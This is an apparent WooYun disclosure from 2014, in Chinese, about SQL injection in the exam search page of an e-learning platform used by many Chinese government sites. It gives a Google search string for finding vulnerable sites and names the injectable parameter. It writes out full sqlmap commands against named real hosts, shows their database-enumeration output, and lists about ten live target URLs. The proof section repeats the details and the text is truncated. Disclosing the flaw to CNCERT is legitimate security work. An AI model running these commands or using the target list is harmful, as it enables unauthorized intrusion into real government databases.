漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-078095
漏洞标题:某大型政府平台sql注入
相关厂商:杭州精英在线教育科技有限公司
漏洞作者: answer
提交时间:2014-10-10 14:37
修复时间:2015-01-08 14:38
公开时间:2015-01-08 14:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-10: 细节已通知厂商并且等待厂商处理中
2014-10-14: 厂商已经确认,细节仅向厂商公开
2014-10-17: 细节向第三方安全合作伙伴开放
2014-12-08: 细节向核心白帽子及相关领域专家公开
2014-12-18: 细节向普通白帽子公开
2014-12-28: 细节向实习白帽子公开
2015-01-08: 细节向公众公开
简要描述:
国庆献礼
详细说明:
用的政府很多
google关键字 inurl:Exam/Default.aspx 技术支持:杭州精英在线教育科技有限公司
说明: 出问题的文件:Exam/Default.aspx 所以只要存在这个文件的网站就基本沦陷 事实上在用的这套系统百分之八十的站都存在Exam/Default.aspx
有问题的地方是考试搜索框的地方:
![K}EYHI}AQ%{NL@]L$0F`M]1.jpg](http://wimg.zone.ci/upload/201410/020157108ccc1d84e5d2647a912241bdf73ec4c4.jpg)
是post所以抓包放sqlmap跑,不同的站的pos的t包有些不大相同,所以每个站都要抓包
注入点存在于参数ctl09%24txtKeyword (期中那个109%不同站数字是不同的 所以比较坑,每个站都要重新抓包)以下是证明:
1
http://www.jhpx.com:8002/exam/default.aspx
![AAE)_5%K%WNGK_G}4@T@`]4.jpg](http://wimg.zone.ci/upload/201410/02020155b00d499b75bfaf0b9da14d6364c78e8d.jpg)
2
www.yzxxc.gov.cn/Exam/Default.aspx
3
突然发不起图了 就复制文字了
http://www.sxxsdxf.cn/Exam/Default.aspx
sqlmap -u "http://www.sxxsdxf.cn/Exam/Default.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE1ODQwMDcwOTUPZBYCAgMQZGQWAgIBD2QWCAIDD2QWAmYPZBYCAgMPFgIeC18hSXRlbUNvdW50AgYWDGYPZBYCZg8VAwExCeWMuuS%2BqOiBlAYxNzYuMDdkAgEPZBYCZg8VAwEyDOWMuuaWh%2BW5v%2BWxgAYxNjEuNDhkAgIPZBYCZg8VAwEzDOWMuuWfjueuoeWKngYxMzYuODBkAgMPZBYCZg8VAwE0DOWMuueOr%2BS%2FneWxgAYxMzEuMzZkAgQPZBYCZg8VAwE1G%2BWMuuW3peWVhuiBlO%2B8iOaAu%2BWVhuS8mi4uLgYxMzEuMTBkAgUPZBYCZg8VAwE2D%2BWMuuiAgeW5sumDqOWxgAYxMTYuMTZkAgQPZBYCZg9kFgQCAw9kFgJmD2QWAgIDDxYCHwACBRYKZg9kFgJmDxUEATEJ56ug5Li955C0BjQ5MS4wMAQxMjgwZAIBD2QWAmYPFQQBMgblrZnog4MGNDM1Ljg1BDEwOTNkAgIPZBYCZg8VBAEzCeiSi%2BW7uum%2BmQM0MzEEMTA3N2QCAw9kFgJmDxUEATQJ5Y2V5ZKM5qC5BjM4NC4zNQQxOTk4ZAIED2QWAmYPFQQBNQnmn6%2FpnZnmiawFMzc4LjUEMTAxOGQCBQ9kFgJmD2QWAgIFDxYCHwACBRYKZg9kFgJmDxUEATEJ6ams5pmT5pa5BjQ3NS40MAQxMTMwZAIBD2QWAmYPFQQBMgnog6Hlm73ljY4GNDc0LjkwBDIxMjVkAgIPZBYCZg8VBAEzBuW8oOaxnwU0MTIuMQQxMTIwZAIDD2QWAmYPFQQBNAbmsojnkLQGMzQ1LjkwBDEwNjdkAgQPZBYCZg8VBAE1CeaxquWJkeWzsAYyODcuMTUDNDMxZAIFD2QWAmYPZBYCAgMPFgIfAAIFFgpmD2QWBGYPFQEBMWQCAQ8VBAQxNTQ4IeaWsOWei%2BWfjuW4guWMluS4juWfjuS5oeS4gOS9k%2BWMlhXmlrDlnovln47luILljJbkuI4uLi4EMjAyMWQCAQ9kFgRmDxUBATJkAgEPFQQEMTAxODblhajpnaLlu7rmiJDlsI%2FlurfnpL7kvJrnmoTmlL%2FmsrvlrqPoqIDlkozooYzliqjnurLpooYV5YWo6Z2i5bu65oiQ5bCP5bq3Li4uBDE2NzhkAgIPZBYEZg8VAQEzZAIBDxUEBDE3NTEq5Lit5Zu9546w6Zi25q615rCR5peP6Zeu6aKY55qE5Li76KaB6KGo546wFeS4reWbveeOsOmYtuauteawkS4uLgQxNjM3ZAIDD2QWBGYPFQEBNGQCAQ8VBAQxNjgyLeWbtOe7leWPkeWxleaWueW8j%2Bi9rOWPmO%2B8jOWHneiBmuaUuemdqeWFseivhhXlm7Tnu5Xlj5HlsZXmlrnlvI8uLi4EMTQ3NWQCBA9kFgRmDxUBATVkAgEPFQQEMTU1OCfnu5PmnoTmgKflh4%2FnqI7kuI7nqI7liLblu7rorr7vvIjkuIvvvIkV57uT5p6E5oCn5YeP56iO5LiOLi4uBDE0MTBkAgcPZBYCZg9kFgoCAg8WAh4Jb25rZXlkb3duBSFTdWJtaXRLZXlDbGljaygnY3RsMTBfYnRuU2VhcmNoJylkAgQPFgIfAGZkAgUPDxYEHgtSZWNvcmRjb3VudGYeDkN1c3RvbUluZm9UZXh0BTXorrDlvZXmlbDvvJow77yM5YWxMemhte%2B8jOesrDHpobXvvIzmr4%2FpobUxMOadoeiusOW9lWRkAgYPFgIfAGZkAgcPDxYEHwJmHwMFNeiusOW9leaVsO%2B8mjDvvIzlhbEx6aG177yM56ysMemhte%2B8jOavj%2BmhtTEw5p2h6K6w5b2VZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFD2N0bDEwJGJ0blNlYXJjaJRj"wsVRbky%2F%2FFvkY286bCHuKsr&__EVENTVALIDATION=%2FwEWBgK62s3PCgKBpvHtBQLvt8WsDQL"t8WsDQLK0aq0BALJtYOHDoKuwhPhA32ccJHn3EDNnQo%2Bx%2Bjx&hidPageID=6&selectSearch=C"urse&ctl10%24ddl_isornot=0&ctl10%24txtKeyword=fff&ctl10%24btnSearch.x=24&ctl10%"4btnSearch.y=13" -p "ctl10%24txtKeyword" --dbs
1:35:28] [INFO] retrieved: model
[01:35:28] [INFO] retrieved: msdb
[01:35:29] [INFO] retrieved: edushaoxingbasentnew
[01:35:30] [INFO] retrieved: edushaoxingforum
[01:35:30] [INFO] retrieved:
available databases [6]:
[*] edushaoxingbasentnew
[*] edushaoxingforum
[*] master
[*] model
[*] msdb
[*] tempdb
4
root@kali:~# sqlmap -u "http://www.csstudy.gov.cn/Exam/Default.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTk2MzE2NTM4Nw9kFgICAxBkZBYCAgEPZBYIAgQPZBYCZg9kFgICAw8WAh4LXyFJdGVtQ291bnQCBhYMZg9kFgJmDxUDATEJ5biC56eR5Y2PBjExMS42N2QCAQ9kFgJmDxUDATIM57qi5Y2B5a2X5LyaBTcwLjAwZAICD2QWAmYPFQMBMwzluILorqHnlJ%2Flp5QFNjcuNzFkAgMPZBYCZg8VAwE0GOW4guWFrOenr%2BmHkeeuoeeQhuS4reW%2FgwU2NS4wMGQCBA9kFgJmDxUDATUV5biC5L2P5oi%2F5L%2Bd6Zqc5YWs5Y%2B4BTU3LjgzZAIFD2QWAmYPFQMBNgzluILlp5TlhZrmoKEFNTcuNTBkAgUPZBYCZg9kFgICAw8WAh8AAgUWCmYPZBYCZg8VBAExCemZiOWQkeW%2FoAM0MzgDMzQ0ZAIBD2QWAmYPFQQBMgbpg63li4cDNDA2AzE4OWQCAg9kFgJmDxUEATMG5ZGo5LyfAzM4NgMxODJkAgMPZBYCZg8VBAE0CemprOaDoOe%2FlAMzNzgDNTU1ZAIED2QWAmYPFQQBNQnpkrHlrablhpsDMjY5AzMzMGQCBg9kFgJmD2QWAgIDDxYCHwACBRYKZg9kFgRmDxUBATFkAgEPFQQEMjQzMTzlhbPkuo7ljYHlhavlsYrkuInkuK3lhajkvJrnu4%2FmtY7kvZPliLbmlLnpnanop6Por7vvvIjkuIrvvIkV5YWz5LqO5Y2B5YWr5bGK5LiJLi4uBDEyODdkAgEPZBYEZg8VAQEyZAIBDxUEBDI0MzA85YWz5LqO5Y2B5YWr5bGK5LiJ5Lit5YWo5Lya57uP5rWO5L2T5Yi25pS56Z2p6Kej6K%2B777yI5LiL77yJFeWFs%2BS6juWNgeWFq%2BWxiuS4iS4uLgM5ODdkAgIPZBYEZg8VAQEzZAIBDxUEBDI0Mjk56Kej6K%2B75Y2B5YWr5bGK5LiJ5Lit5YWo5Lya77yM5YWo6Z2i5rex5YyW5pS56Z2p77yI5LiK77yJFeino%2Bivu%2BWNgeWFq%2BWxiuS4iS4uLgM4NThkAgMPZBYEZg8VAQE0ZAIBDxUEBDI1MzE55a2m5Lmg5Lmg6L%2BR5bmz5oC75Lmm6K6w5YWz5LqO5YWa55qE5bu66K6%2B55qE6YeN6KaB6K666L%2BwFeWtpuS5oOS5oOi%2FkeW5s%2BaAuy4uLgM3NDRkAgQPZBYEZg8VAQE1ZAIBDxUEBDI0MjVC6K6k55yf5a2m5Lmg6LSv5b275YWa55qE5Y2B5YWr5bGK5LiJ5Lit5YWo5Lya5Yaz5a6a57K%2B56We77yI5LiK77yJFeiupOecn%2BWtpuS5oOi0r%2BW9uy4uLgM3NDBkAgcPZBYCZg9kFgYCAQ8WAh4Jb25rZXlkb3duBSFTdWJtaXRLZXlDbGljaygnY3RsMTFfYnRuU2VhcmNoJylkAgMPFgIfAAIKFhRmD2QWCmYPFQIh5oiQ5Yqf6aKG5a%2B855qE5YWt56eN5oCd57u05pa55rOVG%2BaIkOWKn%2BmihuWvvOeahOWFreenjeaAnS4uLmQCAQ8PFgIeBFRleHQFAjEwZGQCAw8PFgIfAgUBM2RkAgQPFQMBMQEwciAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9MiZwaWQ9MCcgIHRhcmdldD3igJhfYmxhbmvigJk%2B5Y%2BC5Yqg5rWL6K%2BVPC9hPmQCBQ8WAh8CBV88YSBocmVmID0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fcHJlZi5hc3B4P2V4YW1JZD0yJyB0YXJnZXQ9J19ibGFuayc%2B5p%2Bl55yLPC9hPmQCAQ9kFgpmDxUCB3Nhc3Nzc3MHc2Fzc3Nzc2QCAQ8PFgIfAgUBMGRkAgMPDxYCHwIFATBkZAIEDxUDATABMHMgIDxhIGhyZWY9J2h0dHA6Ly93d3cuY3NzdHVkeS5nb3YuY246ODAvRXhhbS9leGFtX3Rlc3QuYXNweD9leGFtX2lkPTExJnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCAg9kFgpmDxUCGOmihuWvvOiAheeahOayn%2BmAmuaKgOW3pxvpooblr7zogIXnmoTmsp%2FpgJrmioDlt6cuLi5kAgEPDxYCHwIFATBkZAIDDw8WAh8CBQEwZGQCBA8VAwIxMAEwciAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9OCZwaWQ9MCcgIHRhcmdldD3igJhfYmxhbmvigJk%2B5Y%2BC5Yqg5rWL6K%2BVPC9hPmQCBQ8WAh8CBQnml6DorrDlvZVkAgMPZBYKZg8VAgzlhbPns7vokKXplIAM5YWz57O76JCl6ZSAZAIBDw8WAh8CBQEwZGQCAw8PFgIfAgUBMGRkAgQPFQMCMTACMjByICA8YSBocmVmPSdodHRwOi8vd3d3LmNzc3R1ZHkuZ292LmNuOjgwL0V4YW0vZXhhbV90ZXN0LmFzcHg%2FZXhhbV9pZD02JnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCBA9kFgpmDxUCD%2BWPjea0l%2BmSseazleinhA%2Flj43mtJfpkrHms5Xop4RkAgEPDxYCHwIFATBkZAIDDw8WAh8CBQEwZGQCBA8VAwEwATByICA8YSBocmVmPSdodHRwOi8vd3d3LmNzc3R1ZHkuZ292LmNuOjgwL0V4YW0vZXhhbV90ZXN0LmFzcHg%2FZXhhbV9pZD01JnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCBQ9kFgpmDxUCEuiQpemUgOWIhuaekOW3peWFtxLokKXplIDliIbmnpDlt6XlhbdkAgEPDxYCHwIFATBkZAIDDw8WAh8CBQEwZGQCBA8VAwIxMAEwciAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9NyZwaWQ9MCcgIHRhcmdldD3igJhfYmxhbmvigJk%2B5Y%2BC5Yqg5rWL6K%2BVPC9hPmQCBQ8WAh8CBQnml6DorrDlvZVkAgYPZBYKZg8VAgnlsI%2FkuaDmg68J5bCP5Lmg5oOvZAIBDw8WAh8CBQEwZGQCAw8PFgIfAgUBMGRkAgQPFQMCMTABMHIgIDxhIGhyZWY9J2h0dHA6Ly93d3cuY3NzdHVkeS5nb3YuY246ODAvRXhhbS9leGFtX3Rlc3QuYXNweD9leGFtX2lkPTQmcGlkPTAnICB0YXJnZXQ94oCYX2JsYW5r4oCZPuWPguWKoOa1i%2BivlTwvYT5kAgUPFgIfAgUJ5peg6K6w5b2VZAIHD2QWCmYPFQIn6auY57qn6ZSA5ZSu5rKf6YCa5oqA5ben77ya56ys5LiA6YOo5YiGG%2BmrmOe6p%2BmUgOWUruayn%2BmAmuaKgOW3py4uLmQCAQ8PFgIfAgUBMGRkAgMPDxYCHwIFATBkZAIEDxUDAjEwATByICA8YSBocmVmPSdodHRwOi8vd3d3LmNzc3R1ZHkuZ292LmNuOjgwL0V4YW0vZXhhbV90ZXN0LmFzcHg%2FZXhhbV9pZD0zJnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCCA9kFgpmDxUCEWFhYWFhYWFhYWFhYWFhYWFhC2FhYWFhYWFhLi4uZAIBDw8WAh8CBQEwZGQCAw8PFgIfAgUBMGRkAgQPFQMBMgEwcyAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9MTImcGlkPTAnICB0YXJnZXQ94oCYX2JsYW5r4oCZPuWPguWKoOa1i%2BivlTwvYT5kAgUPFgIfAgUJ5peg6K6w5b2VZAIJD2QWCmYPFQIb5Yib5paw56S%2B5Lya5rK755CG77yI5LiL77yJG%2BWIm%2BaWsOekvuS8muayu%2BeQhu%2B8iOS4iy4uLmQCAQ8PFgIfAgUBMGRkAgMPDxYCHwIFATBkZAIEDxUDATEBMBLor7flhYjpgInlrabor77ku7ZkAgUPFgIfAgUJ5peg6K6w5b2VZAIEDw8WBB4LUmVjb3JkY291bnQCNB4OQ3VzdG9tSW5mb1RleHQFNuiusOW9leaVsO%2B8mjUy77yM5YWxNumhte%2B8jOesrDHpobXvvIzmr4%2FpobUxMOadoeiusOW9lWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jdGwxMSRidG5TZWFyY2htS4JBUpHZuiWXYI25QZdIY8gDFA%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLn9fKjAQKBpvHtBQLu6IzfAQLJyaq0BALGrYOHDo7hGuFgIVEBA2RO3ELakr%2FbolQR&hidPageID=6&ctl05%24hdnServerID=-1&selectSearch=Course&ctl11%24txtKeyword=ff&ctl11%24btnSearch.x=46&ctl11%24btnSearch.y=8" -p "ctl11%24txtKeyword" --dbs
FO] retrieved: master
[02:13:27] [INFO] retrieved: model
[02:13:27] [INFO] retrieved: msdb
[02:13:28] [INFO] retrieved: ReportServer
[02:13:28] [INFO] retrieved: ReportServerTempDB
[02:13:29] [INFO] retrieved: tempdb
available databases [11]:
[*] 1
[*] educhangshu
[*] educhangshubasentNew
[*] educhangshubasentold
[*] educhangshuforum
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
到这里差不多了
顺便搜集了些站供中心验证:
http://www.jhpx.com:8002/exam/default.aspx
http://www.yzxxc.gov.cn/Exam/Default.aspx
http://www.sxxsdxf.cn/Exam/Default.aspx
http://www.whce.gov.cn/Exam/Default.aspx
http://gbjy.yw.gov.cn/Exam/Default.aspx
http://www.yulinstudy.gov.cn/Exam/Default.aspx
http://www.0575study.gov.cn/Exam/Default.aspx
http://www.csstudy.gov.cn/Exam/Default.aspx
http://wssy.hnsy.org.cn/Exam/Default.aspx
http://www.ndgb.gov.cn/Exam/Default.aspx
................
漏洞证明:
用的政府很多
google关键字 inurl:Exam/Default.aspx 技术支持:杭州精英在线教育科技有限公司
说明: 出问题的文件:Exam/Default.aspx 所以只要存在这个文件的网站就基本沦陷 事实上百分之八十的站都存在Exam/Default.aspx
有问题的地方是考试搜索框的地方:
是post所以抓包放sqlmap跑,不同的站的pos的t包有些不大相同,所以每个站都要抓包
注入点存在于参数ctl09%24txtKeyword (期中那个109%不同站数字是不同的 所以比较坑,每个站都要重新抓包)以下是证明:
1
http://www.jhpx.com:8002/exam/default.aspx
2
www.yzxxc.gov.cn/Exam/Default.aspx
3
突然发不起图了 就复制文字了
http://www.sxxsdxf.cn/Exam/Default.aspx
sqlmap -u "http://www.sxxsdxf.cn/Exam/Default.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE1ODQwMDcwOTUPZBYCAgMQZGQWAgIBD2QWCAIDD2QWAmYPZBYCAgMPFgIeC18hSXRlbUNvdW50AgYWDGYPZBYCZg8VAwExCeWMuuS%2BqOiBlAYxNzYuMDdkAgEPZBYCZg8VAwEyDOWMuuaWh%2BW5v%2BWxgAYxNjEuNDhkAgIPZBYCZg8VAwEzDOWMuuWfjueuoeWKngYxMzYuODBkAgMPZBYCZg8VAwE0DOWMuueOr%2BS%2FneWxgAYxMzEuMzZkAgQPZBYCZg8VAwE1G%2BWMuuW3peWVhuiBlO%2B8iOaAu%2BWVhuS8mi4uLgYxMzEuMTBkAgUPZBYCZg8VAwE2D%2BWMuuiAgeW5sumDqOWxgAYxMTYuMTZkAgQPZBYCZg9kFgQCAw9kFgJmD2QWAgIDDxYCHwACBRYKZg9kFgJmDxUEATEJ56ug5Li955C0BjQ5MS4wMAQxMjgwZAIBD2QWAmYPFQQBMgblrZnog4MGNDM1Ljg1BDEwOTNkAgIPZBYCZg8VBAEzCeiSi%2BW7uum%2BmQM0MzEEMTA3N2QCAw9kFgJmDxUEATQJ5Y2V5ZKM5qC5BjM4NC4zNQQxOTk4ZAIED2QWAmYPFQQBNQnmn6%2FpnZnmiawFMzc4LjUEMTAxOGQCBQ9kFgJmD2QWAgIFDxYCHwACBRYKZg9kFgJmDxUEATEJ6ams5pmT5pa5BjQ3NS40MAQxMTMwZAIBD2QWAmYPFQQBMgnog6Hlm73ljY4GNDc0LjkwBDIxMjVkAgIPZBYCZg8VBAEzBuW8oOaxnwU0MTIuMQQxMTIwZAIDD2QWAmYPFQQBNAbmsojnkLQGMzQ1LjkwBDEwNjdkAgQPZBYCZg8VBAE1CeaxquWJkeWzsAYyODcuMTUDNDMxZAIFD2QWAmYPZBYCAgMPFgIfAAIFFgpmD2QWBGYPFQEBMWQCAQ8VBAQxNTQ4IeaWsOWei%2BWfjuW4guWMluS4juWfjuS5oeS4gOS9k%2BWMlhXmlrDlnovln47luILljJbkuI4uLi4EMjAyMWQCAQ9kFgRmDxUBATJkAgEPFQQEMTAxODblhajpnaLlu7rmiJDlsI%2FlurfnpL7kvJrnmoTmlL%2FmsrvlrqPoqIDlkozooYzliqjnurLpooYV5YWo6Z2i5bu65oiQ5bCP5bq3Li4uBDE2NzhkAgIPZBYEZg8VAQEzZAIBDxUEBDE3NTEq5Lit5Zu9546w6Zi25q615rCR5peP6Zeu6aKY55qE5Li76KaB6KGo546wFeS4reWbveeOsOmYtuauteawkS4uLgQxNjM3ZAIDD2QWBGYPFQEBNGQCAQ8VBAQxNjgyLeWbtOe7leWPkeWxleaWueW8j%2Bi9rOWPmO%2B8jOWHneiBmuaUuemdqeWFseivhhXlm7Tnu5Xlj5HlsZXmlrnlvI8uLi4EMTQ3NWQCBA9kFgRmDxUBATVkAgEPFQQEMTU1OCfnu5PmnoTmgKflh4%2FnqI7kuI7nqI7liLblu7rorr7vvIjkuIvvvIkV57uT5p6E5oCn5YeP56iO5LiOLi4uBDE0MTBkAgcPZBYCZg9kFgoCAg8WAh4Jb25rZXlkb3duBSFTdWJtaXRLZXlDbGljaygnY3RsMTBfYnRuU2VhcmNoJylkAgQPFgIfAGZkAgUPDxYEHgtSZWNvcmRjb3VudGYeDkN1c3RvbUluZm9UZXh0BTXorrDlvZXmlbDvvJow77yM5YWxMemhte%2B8jOesrDHpobXvvIzmr4%2FpobUxMOadoeiusOW9lWRkAgYPFgIfAGZkAgcPDxYEHwJmHwMFNeiusOW9leaVsO%2B8mjDvvIzlhbEx6aG177yM56ysMemhte%2B8jOavj%2BmhtTEw5p2h6K6w5b2VZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFD2N0bDEwJGJ0blNlYXJjaJRj"wsVRbky%2F%2FFvkY286bCHuKsr&__EVENTVALIDATION=%2FwEWBgK62s3PCgKBpvHtBQLvt8WsDQL"t8WsDQLK0aq0BALJtYOHDoKuwhPhA32ccJHn3EDNnQo%2Bx%2Bjx&hidPageID=6&selectSearch=C"urse&ctl10%24ddl_isornot=0&ctl10%24txtKeyword=fff&ctl10%24btnSearch.x=24&ctl10%"4btnSearch.y=13" -p "ctl10%24txtKeyword" --dbs
1:35:28] [INFO] retrieved: model
[01:35:28] [INFO] retrieved: msdb
[01:35:29] [INFO] retrieved: edushaoxingbasentnew
[01:35:30] [INFO] retrieved: edushaoxingforum
[01:35:30] [INFO] retrieved:
available databases [6]:
[*] edushaoxingbasentnew
[*] edushaoxingforum
[*] master
[*] model
[*] msdb
[*] tempdb
4
root@kali:~# sqlmap -u "http://www.csstudy.gov.cn/Exam/Default.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTk2MzE2NTM4Nw9kFgICAxBkZBYCAgEPZBYIAgQPZBYCZg9kFgICAw8WAh4LXyFJdGVtQ291bnQCBhYMZg9kFgJmDxUDATEJ5biC56eR5Y2PBjExMS42N2QCAQ9kFgJmDxUDATIM57qi5Y2B5a2X5LyaBTcwLjAwZAICD2QWAmYPFQMBMwzluILorqHnlJ%2Flp5QFNjcuNzFkAgMPZBYCZg8VAwE0GOW4guWFrOenr%2BmHkeeuoeeQhuS4reW%2FgwU2NS4wMGQCBA9kFgJmDxUDATUV5biC5L2P5oi%2F5L%2Bd6Zqc5YWs5Y%2B4BTU3LjgzZAIFD2QWAmYPFQMBNgzluILlp5TlhZrmoKEFNTcuNTBkAgUPZBYCZg9kFgICAw8WAh8AAgUWCmYPZBYCZg8VBAExCemZiOWQkeW%2FoAM0MzgDMzQ0ZAIBD2QWAmYPFQQBMgbpg63li4cDNDA2AzE4OWQCAg9kFgJmDxUEATMG5ZGo5LyfAzM4NgMxODJkAgMPZBYCZg8VBAE0CemprOaDoOe%2FlAMzNzgDNTU1ZAIED2QWAmYPFQQBNQnpkrHlrablhpsDMjY5AzMzMGQCBg9kFgJmD2QWAgIDDxYCHwACBRYKZg9kFgRmDxUBATFkAgEPFQQEMjQzMTzlhbPkuo7ljYHlhavlsYrkuInkuK3lhajkvJrnu4%2FmtY7kvZPliLbmlLnpnanop6Por7vvvIjkuIrvvIkV5YWz5LqO5Y2B5YWr5bGK5LiJLi4uBDEyODdkAgEPZBYEZg8VAQEyZAIBDxUEBDI0MzA85YWz5LqO5Y2B5YWr5bGK5LiJ5Lit5YWo5Lya57uP5rWO5L2T5Yi25pS56Z2p6Kej6K%2B777yI5LiL77yJFeWFs%2BS6juWNgeWFq%2BWxiuS4iS4uLgM5ODdkAgIPZBYEZg8VAQEzZAIBDxUEBDI0Mjk56Kej6K%2B75Y2B5YWr5bGK5LiJ5Lit5YWo5Lya77yM5YWo6Z2i5rex5YyW5pS56Z2p77yI5LiK77yJFeino%2Bivu%2BWNgeWFq%2BWxiuS4iS4uLgM4NThkAgMPZBYEZg8VAQE0ZAIBDxUEBDI1MzE55a2m5Lmg5Lmg6L%2BR5bmz5oC75Lmm6K6w5YWz5LqO5YWa55qE5bu66K6%2B55qE6YeN6KaB6K666L%2BwFeWtpuS5oOS5oOi%2FkeW5s%2BaAuy4uLgM3NDRkAgQPZBYEZg8VAQE1ZAIBDxUEBDI0MjVC6K6k55yf5a2m5Lmg6LSv5b275YWa55qE5Y2B5YWr5bGK5LiJ5Lit5YWo5Lya5Yaz5a6a57K%2B56We77yI5LiK77yJFeiupOecn%2BWtpuS5oOi0r%2BW9uy4uLgM3NDBkAgcPZBYCZg9kFgYCAQ8WAh4Jb25rZXlkb3duBSFTdWJtaXRLZXlDbGljaygnY3RsMTFfYnRuU2VhcmNoJylkAgMPFgIfAAIKFhRmD2QWCmYPFQIh5oiQ5Yqf6aKG5a%2B855qE5YWt56eN5oCd57u05pa55rOVG%2BaIkOWKn%2BmihuWvvOeahOWFreenjeaAnS4uLmQCAQ8PFgIeBFRleHQFAjEwZGQCAw8PFgIfAgUBM2RkAgQPFQMBMQEwciAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9MiZwaWQ9MCcgIHRhcmdldD3igJhfYmxhbmvigJk%2B5Y%2BC5Yqg5rWL6K%2BVPC9hPmQCBQ8WAh8CBV88YSBocmVmID0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fcHJlZi5hc3B4P2V4YW1JZD0yJyB0YXJnZXQ9J19ibGFuayc%2B5p%2Bl55yLPC9hPmQCAQ9kFgpmDxUCB3Nhc3Nzc3MHc2Fzc3Nzc2QCAQ8PFgIfAgUBMGRkAgMPDxYCHwIFATBkZAIEDxUDATABMHMgIDxhIGhyZWY9J2h0dHA6Ly93d3cuY3NzdHVkeS5nb3YuY246ODAvRXhhbS9leGFtX3Rlc3QuYXNweD9leGFtX2lkPTExJnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCAg9kFgpmDxUCGOmihuWvvOiAheeahOayn%2BmAmuaKgOW3pxvpooblr7zogIXnmoTmsp%2FpgJrmioDlt6cuLi5kAgEPDxYCHwIFATBkZAIDDw8WAh8CBQEwZGQCBA8VAwIxMAEwciAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9OCZwaWQ9MCcgIHRhcmdldD3igJhfYmxhbmvigJk%2B5Y%2BC5Yqg5rWL6K%2BVPC9hPmQCBQ8WAh8CBQnml6DorrDlvZVkAgMPZBYKZg8VAgzlhbPns7vokKXplIAM5YWz57O76JCl6ZSAZAIBDw8WAh8CBQEwZGQCAw8PFgIfAgUBMGRkAgQPFQMCMTACMjByICA8YSBocmVmPSdodHRwOi8vd3d3LmNzc3R1ZHkuZ292LmNuOjgwL0V4YW0vZXhhbV90ZXN0LmFzcHg%2FZXhhbV9pZD02JnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCBA9kFgpmDxUCD%2BWPjea0l%2BmSseazleinhA%2Flj43mtJfpkrHms5Xop4RkAgEPDxYCHwIFATBkZAIDDw8WAh8CBQEwZGQCBA8VAwEwATByICA8YSBocmVmPSdodHRwOi8vd3d3LmNzc3R1ZHkuZ292LmNuOjgwL0V4YW0vZXhhbV90ZXN0LmFzcHg%2FZXhhbV9pZD01JnBpZD0wJyAgdGFyZ2V0PeKAmF9ibGFua%2BKAmT7lj4LliqDmtYvor5U8L2E%2BZAIFDxYCHwIFCeaXoOiusOW9lWQCBQ9kFgpmDxUCEuiQpemUgOWIhuaekOW3peWFtxLokKXplIDliIbmnpDlt6XlhbdkAgEPDxYCHwIFATBkZAIDDw8WAh8CBQEwZGQCBA8VAwIxMAEwciAgPGEgaHJlZj0naHR0cDovL3d3dy5jc3N0dWR5Lmdvdi5jbjo4MC9FeGFtL2V4YW1fdGVzdC5hc3B4P2V4YW1faWQ9NyZwaWQ9MCcgIHRhcmdldD3igJhfYmxhbmvigJk%2B5Y%2BC5Yqg5rWL6K%2BVPC9hPmQCBQ8WAh8CBQnml6DorrDlvZVkAgYPZBYKZg8VAgnlsI%2FkuaDmg68J5bCP5Lmg5oOvZAIBDw8WAh8CBQEwZGQCAw8PFgIfAgUBMGRkAgQPFQMCMTABMHIgIDxhIGhyZWY9J2h0dHA6Ly93d3cuY3NzdHVkeS5nb3YuY246ODAvRXhhbS9leGFtX3Rlc3QuYXNweD9leGFtX2lkPTQmcGlkPTAnICB0YXJnZXQ94oCYX2JsYW5r4oCZPuWPguWKoOa1i